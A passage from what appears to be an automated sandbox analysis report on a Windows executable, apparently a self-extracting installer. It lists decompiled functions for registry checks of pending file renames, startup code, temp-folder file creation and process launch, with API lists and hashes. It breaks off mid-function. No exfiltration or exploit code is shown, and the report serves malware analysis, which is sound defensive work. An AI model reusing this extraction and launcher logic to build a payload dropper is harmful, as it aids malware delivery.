                                                                                                                                                                                                                                    • Instruction ID: 125cfa7c81adbab0fbf8f7f76c25cee134d25006f7ef051e404a57ef8c01fb33
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43f651f3391ef192c497bfbc0c6e30c6af2b5fc786458bd32b7fff1cca5d2d8e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F711047170060467E3209F269D49FEF366DEBC1315F00013ABA46F22E0CE7889568AAE
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 563 40256d-40257d 564 402622-402627 call 4024e0 563->564 565 402583-402589 563->565 570 402629-40262f 564->570 566 4025e8-402607 RegOpenKeyExA 565->566 567 40258b 565->567 571 4025e3-4025e6 566->571 572 402609-402620 RegQueryInfoKeyA 566->572 569 402591-402595 567->569 567->570 569->570 574 40259b-4025ba RegOpenKeyExA 569->574 571->570 575 4025d1-4025dd RegCloseKey 572->575 574->571 576 4025bc-4025cb RegQueryValueExA 574->576 575->571 576->575
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E0040256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E004024E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}











                                                                                                                                                                                                                                    0x00402572
                                                                                                                                                                                                                                    0x00402573
                                                                                                                                                                                                                                    0x00402575
                                                                                                                                                                                                                                    0x00402578
                                                                                                                                                                                                                                    0x0040257d
                                                                                                                                                                                                                                    0x00402627
                                                                                                                                                                                                                                    0x00402583
                                                                                                                                                                                                                                    0x00402586
                                                                                                                                                                                                                                    0x00402589
                                                                                                                                                                                                                                    0x004025eb
                                                                                                                                                                                                                                    0x00402607
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402609
                                                                                                                                                                                                                                    0x0040261a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040261a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040258b
                                                                                                                                                                                                                                    0x0040258b
                                                                                                                                                                                                                                    0x0040259e
                                                                                                                                                                                                                                    0x004025b2
                                                                                                                                                                                                                                    0x004025ba
                                                                                                                                                                                                                                    0x004025cb
                                                                                                                                                                                                                                    0x004025d1
                                                                                                                                                                                                                                    0x004025d6
                                                                                                                                                                                                                                    0x004025da
                                                                                                                                                                                                                                    0x004025dd
                                                                                                                                                                                                                                    0x004025dd
                                                                                                                                                                                                                                    0x004025e3
                                                                                                                                                                                                                                    0x004025e3
                                                                                                                                                                                                                                    0x004025e3
                                                                                                                                                                                                                                    0x0040258b
                                                                                                                                                                                                                                    0x00402589
                                                                                                                                                                                                                                    0x0040262f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00404096,00404096,?,00401ED3,00000001,00000000,?,?,00404137,?), ref: 004025B2
                                                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00404096,?,00401ED3,00000001,00000000,?,?,00404137,?,00404096), ref: 004025CB
                                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,00401ED3,00000001,00000000,?,?,00404137,?,00404096), ref: 004025DD
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00404096,00404096,?,00401ED3,00000001,00000000,?,?,00404137,?), ref: 004025FF
                                                                                                                                                                                                                                    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00404096,00000000,00000000,00000000,00000000,?,00401ED3,00000001,00000000), ref: 0040261A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 004025F5
                                                                                                                                                                                                                                    • PendingFileRenameOperations, xrefs: 004025C3
                                                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager, xrefs: 004025A8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                    • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                    • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                    • Opcode ID: c2d3288791866de7610645414065337d80aaeaca1c7ddf0c8aceb1b598e70452
                                                                                                                                                                                                                                    • Instruction ID: 778f9ec0fea580b62285155236816de8bc499f761098cae054ab7690dd904a70
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2d3288791866de7610645414065337d80aaeaca1c7ddf0c8aceb1b598e70452
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31118235902228BBDF209B919E0DDFB7E7CDF017A5F104076B808B21C0D6B44E48D6A9
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00406A60 Relevance: 13.6, APIs: 9, Instructions: 138sleepCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 577 406a60-406a91 call 407155 call 407208 GetStartupInfoW 583 406a93-406aa2 577->583 584 406aa4-406aa6 583->584 585 406abc-406abe 583->585 587 406aa8-406aad 584->587 588 406aaf-406aba Sleep 584->588 586 406abf-406ac5 585->586 589 406ad1-406ad7 586->589 590 406ac7-406acf _amsg_exit 586->590 587->586 588->583 592 406b05 589->592 593 406ad9-406af2 call 406c3f 589->593 591 406b0b-406b11 590->591 595 406b13-406b24 _initterm 591->595 596 406b2e-406b30 591->596 592->591 593->591 600 406af4-406b00 593->600 595->596 598 406b32-406b39 596->598 599 406b3b-406b42 596->599 598->599 601 406b44-406b51 call 407060 599->601 602 406b67-406b71 599->602 605 406c39-406c3e call 40724d 600->605 601->602 610 406b53-406b65 601->610 604 406b74-406b79 602->604 607 406bc5-406bc8 604->607 608 406b7b-406b7d 604->608 611 406bd6-406be3 _ismbblead 607->611 612 406bca-406bd3 607->612 613 406b94-406b98 608->613 614 406b7f-406b81 608->614 610->602 616 406be5-406be6 611->616 617 406be9-406bed 611->617 612->611 619 406ba0-406ba2 613->619 620 406b9a-406b9e 613->620 614->607 618 406b83-406b85 614->618 616->617 617->604 618->613 623 406b87-406b8a 618->623 621 406ba3-406bbc call 402bfb 619->621 620->621 627 406c1e-406c25 621->627 628 406bbe-406bbf exit 621->628 623->613 625 406b8c-406b92 623->625 625->618 629 406c32 627->629 630 406c27-406c2d _cexit 627->630 628->607 629->605 630->629
                                                                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                                                                    			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00407155();
				_push(0x58);
				_push(0x4072b8);
				E00407208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x4088b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x4088b0; // 0x2
						if(__eflags != 0) {
							 *0x4081e4 = _t58;
							goto L13;
						} else {
							 *0x4088b0 = _t58;
							__eflags = E00406C3F(0x4010b8, 0x4010c4);
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00406FF4();
						L13:
						_t68 =  *0x4088b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x4010b4);
							_push(0x4010ac);
							L00407202();
							 *0x4088b0 = 2;
						}
						if(_t53 == 0) {
							 *0x4088ac = 0;
						}
						_t71 =  *0x4088b4;
						if( *0x4088b4 != 0 && E00407060(_t71, 0x4088b4) != 0) {
							_t60 =  *0x4088b4; // 0x0
							 *0x40a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x74895b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00402BFB(0x400000, 0, _t59); // executed
							 *0x4081e0 = _t30;
							__eflags =  *0x4081f8;
							if( *0x4081f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x4081e4;
							if( *0x4081e4 == 0) {
								__imp___cexit();
								_t30 =  *0x4081e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0040724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

















                                                                                                                                                                                                                                    0x00406a60
                                                                                                                                                                                                                                    0x00406a6a
                                                                                                                                                                                                                                    0x00406a6c
                                                                                                                                                                                                                                    0x00406a71
                                                                                                                                                                                                                                    0x00406a78
                                                                                                                                                                                                                                    0x00406a7f
                                                                                                                                                                                                                                    0x00406a85
                                                                                                                                                                                                                                    0x00406a8e
                                                                                                                                                                                                                                    0x00406a91
                                                                                                                                                                                                                                    0x00406a93
                                                                                                                                                                                                                                    0x00406a9c
                                                                                                                                                                                                                                    0x00406aa2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406aa6
                                                                                                                                                                                                                                    0x00406ab4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406aa8
                                                                                                                                                                                                                                    0x00406aaa
                                                                                                                                                                                                                                    0x00406aab
                                                                                                                                                                                                                                    0x00406aab
                                                                                                                                                                                                                                    0x00406abf
                                                                                                                                                                                                                                    0x00406abf
                                                                                                                                                                                                                                    0x00406ac5
                                                                                                                                                                                                                                    0x00406ad1
                                                                                                                                                                                                                                    0x00406ad7
                                                                                                                                                                                                                                    0x00406b05
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406ad9
                                                                                                                                                                                                                                    0x00406ad9
                                                                                                                                                                                                                                    0x00406af0
                                                                                                                                                                                                                                    0x00406af2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406af4
                                                                                                                                                                                                                                    0x00406af4
                                                                                                                                                                                                                                    0x00406afb
                                                                                                                                                                                                                                    0x00406afb
                                                                                                                                                                                                                                    0x00406af2
                                                                                                                                                                                                                                    0x00406ac7
                                                                                                                                                                                                                                    0x00406ac7
                                                                                                                                                                                                                                    0x00406ac9
                                                                                                                                                                                                                                    0x00406b0b
                                                                                                                                                                                                                                    0x00406b0b
                                                                                                                                                                                                                                    0x00406b11
                                                                                                                                                                                                                                    0x00406b13
                                                                                                                                                                                                                                    0x00406b18
                                                                                                                                                                                                                                    0x00406b1d
                                                                                                                                                                                                                                    0x00406b24
                                                                                                                                                                                                                                    0x00406b24
                                                                                                                                                                                                                                    0x00406b30
                                                                                                                                                                                                                                    0x00406b39
                                                                                                                                                                                                                                    0x00406b39
                                                                                                                                                                                                                                    0x00406b3b
                                                                                                                                                                                                                                    0x00406b42
                                                                                                                                                                                                                                    0x00406b57
                                                                                                                                                                                                                                    0x00406b5f
                                                                                                                                                                                                                                    0x00406b65
                                                                                                                                                                                                                                    0x00406b65
                                                                                                                                                                                                                                    0x00406b67
                                                                                                                                                                                                                                    0x00406b6c
                                                                                                                                                                                                                                    0x00406b6e
                                                                                                                                                                                                                                    0x00406b71
                                                                                                                                                                                                                                    0x00406b74
                                                                                                                                                                                                                                    0x00406b74
                                                                                                                                                                                                                                    0x00406b79
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406b7d
                                                                                                                                                                                                                                    0x00406b81
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406b83
                                                                                                                                                                                                                                    0x00406b8c
                                                                                                                                                                                                                                    0x00406b8d
                                                                                                                                                                                                                                    0x00406b90
                                                                                                                                                                                                                                    0x00406b90
                                                                                                                                                                                                                                    0x00406b83
                                                                                                                                                                                                                                    0x00406b81
                                                                                                                                                                                                                                    0x00406b94
                                                                                                                                                                                                                                    0x00406b98
                                                                                                                                                                                                                                    0x00406ba2
                                                                                                                                                                                                                                    0x00406b9a
                                                                                                                                                                                                                                    0x00406b9a
                                                                                                                                                                                                                                    0x00406b9a
                                                                                                                                                                                                                                    0x00406ba3
                                                                                                                                                                                                                                    0x00406bab
                                                                                                                                                                                                                                    0x00406bb0
                                                                                                                                                                                                                                    0x00406bb5
                                                                                                                                                                                                                                    0x00406bbc
                                                                                                                                                                                                                                    0x00406bbf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406bbf
                                                                                                                                                                                                                                    0x00406c1e
                                                                                                                                                                                                                                    0x00406c25
                                                                                                                                                                                                                                    0x00406c27
                                                                                                                                                                                                                                    0x00406c2d
                                                                                                                                                                                                                                    0x00406c2d
                                                                                                                                                                                                                                    0x00406c32
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406bc5
                                                                                                                                                                                                                                    0x00406bc5
                                                                                                                                                                                                                                    0x00406bc8
                                                                                                                                                                                                                                    0x00406bcc
                                                                                                                                                                                                                                    0x00406bce
                                                                                                                                                                                                                                    0x00406bce
                                                                                                                                                                                                                                    0x00406bd1
                                                                                                                                                                                                                                    0x00406bd3
                                                                                                                                                                                                                                    0x00406bd3
                                                                                                                                                                                                                                    0x00406bd6
                                                                                                                                                                                                                                    0x00406bda
                                                                                                                                                                                                                                    0x00406be1
                                                                                                                                                                                                                                    0x00406be3
                                                                                                                                                                                                                                    0x00406be5
                                                                                                                                                                                                                                    0x00406be5
                                                                                                                                                                                                                                    0x00406be6
                                                                                                                                                                                                                                    0x00406be6
                                                                                                                                                                                                                                    0x00406be9
                                                                                                                                                                                                                                    0x00406bea
                                                                                                                                                                                                                                    0x00406bea
                                                                                                                                                                                                                                    0x00406b74
                                                                                                                                                                                                                                    0x00406c39
                                                                                                                                                                                                                                    0x00406c3e
                                                                                                                                                                                                                                    0x00406c3e
                                                                                                                                                                                                                                    0x00406abe
                                                                                                                                                                                                                                    0x00406abe
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00407155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00407182
                                                                                                                                                                                                                                      • Part of subcall function 00407155: GetCurrentProcessId.KERNEL32 ref: 00407191
                                                                                                                                                                                                                                      • Part of subcall function 00407155: GetCurrentThreadId.KERNEL32 ref: 0040719A
                                                                                                                                                                                                                                      • Part of subcall function 00407155: GetTickCount.KERNEL32 ref: 004071A3
                                                                                                                                                                                                                                      • Part of subcall function 00407155: QueryPerformanceCounter.KERNEL32(?), ref: 004071B8
                                                                                                                                                                                                                                    • GetStartupInfoW.KERNEL32(?,004072B8,00000058), ref: 00406A7F
                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00406AB4
                                                                                                                                                                                                                                    • _amsg_exit.MSVCRT ref: 00406AC9
                                                                                                                                                                                                                                    • _initterm.MSVCRT ref: 00406B1D
                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00406B49
                                                                                                                                                                                                                                    • exit.KERNELBASE ref: 00406BBF
                                                                                                                                                                                                                                    • _ismbblead.MSVCRT ref: 00406BDA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 836923961-0
                                                                                                                                                                                                                                    • Opcode ID: 23f8bd3fb82f9f3920aac8045ba76bf5d17e43c9f1484d607dcc2f0c82561cbd
                                                                                                                                                                                                                                    • Instruction ID: 9f93abb3083409938a6c880a1f3258a823be3681a554c64202715cd4aa4e3ace
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23f8bd3fb82f9f3920aac8045ba76bf5d17e43c9f1484d607dcc2f0c82561cbd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2741C4719443258BEB21AB689A0476B77F4AB44720F25403FE883F73D1CF7C58618A9E
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004058C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74memoryfileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 631 4058c8-4058d5 632 4058d8-4058dd 631->632 632->632 633 4058df-4058f1 LocalAlloc 632->633 634 4058f3-405901 call 4044b9 633->634 635 405919-405959 call 401680 call 40658a CreateFileA LocalFree 633->635 639 405906-405910 call 406285 634->639 635->639 645 40595b-40596c CloseHandle GetFileAttributesA 635->645 644 405912-405918 639->644 645->639 646 40596e-405970 645->646 646->639 647 405972-40597b 646->647 647->644
                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                    			E004058C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00401680(_t20, _t36, _t33);
					E0040658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x409124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x409124 = E00406285();
					_t14 = 0;
				}
				return _t14;
			}













                                                                                                                                                                                                                                    0x004058cd
                                                                                                                                                                                                                                    0x004058d1
                                                                                                                                                                                                                                    0x004058d3
                                                                                                                                                                                                                                    0x004058d5
                                                                                                                                                                                                                                    0x004058d8
                                                                                                                                                                                                                                    0x004058d8
                                                                                                                                                                                                                                    0x004058da
                                                                                                                                                                                                                                    0x004058db
                                                                                                                                                                                                                                    0x004058e1
                                                                                                                                                                                                                                    0x004058ed
                                                                                                                                                                                                                                    0x004058f1
                                                                                                                                                                                                                                    0x0040591e
                                                                                                                                                                                                                                    0x0040592c
                                                                                                                                                                                                                                    0x00405943
                                                                                                                                                                                                                                    0x0040594a
                                                                                                                                                                                                                                    0x0040594d
                                                                                                                                                                                                                                    0x00405953
                                                                                                                                                                                                                                    0x00405959
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040595b
                                                                                                                                                                                                                                    0x0040595c
                                                                                                                                                                                                                                    0x00405963
                                                                                                                                                                                                                                    0x0040596c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405972
                                                                                                                                                                                                                                    0x00405974
                                                                                                                                                                                                                                    0x0040597a
                                                                                                                                                                                                                                    0x0040597a
                                                                                                                                                                                                                                    0x0040596c
                                                                                                                                                                                                                                    0x004058f3
                                                                                                                                                                                                                                    0x00405901
                                                                                                                                                                                                                                    0x00405906
                                                                                                                                                                                                                                    0x0040590b
                                                                                                                                                                                                                                    0x00405910
                                                                                                                                                                                                                                    0x00405910
                                                                                                                                                                                                                                    0x00405918

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004058E7
                                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405943
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040594D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040595C
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405963
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                    • API String ID: 747627703-2139698323
                                                                                                                                                                                                                                    • Opcode ID: 19bced661d23b48288e7b252ec9bc7e0d1aaf31755be21c792b5c023435c06d0
                                                                                                                                                                                                                                    • Instruction ID: b28bd581754d51eb60e6e201e72a6d4170e8326a15d096e72f08d1eb5dd15189
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19bced661d23b48288e7b252ec9bc7e0d1aaf31755be21c792b5c023435c06d0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA1126B16002106BD7242F7A6C4DB9B7E9DDF85364B10463AB90AF32D1CA788C2586AC
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00403FEF Relevance: 10.6, APIs: 7, Instructions: 97processsynchronizationwindowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 675 403fef-404010 676 404016-40403b CreateProcessA 675->676 677 40410a-40411a call 406ce0 675->677 678 404041-40406e WaitForSingleObject GetExitCodeProcess 676->678 679 4040c4-404101 call 406285 GetLastError FormatMessageA call 4044b9 676->679 682 404070-404077 678->682 683 404091 call 40411b 678->683 691 404106 679->691 682->683 686 404079-40407b 682->686 690 404096-4040b8 CloseHandle * 2 683->690 686->683 689 40407d-404089 686->689 689->683 692 40408b 689->692 693 404108 690->693 694 4040ba-4040c0 690->694 691->693 692->683 693->677 694->693 695 4040c2 694->695 695->691
                                                                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                                                                    			E00403FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x408004; // 0x8f135e3b
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00406CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x409124 = E00406285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E004044B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x408a28; // 0x0
				if(_t53 == 0) {
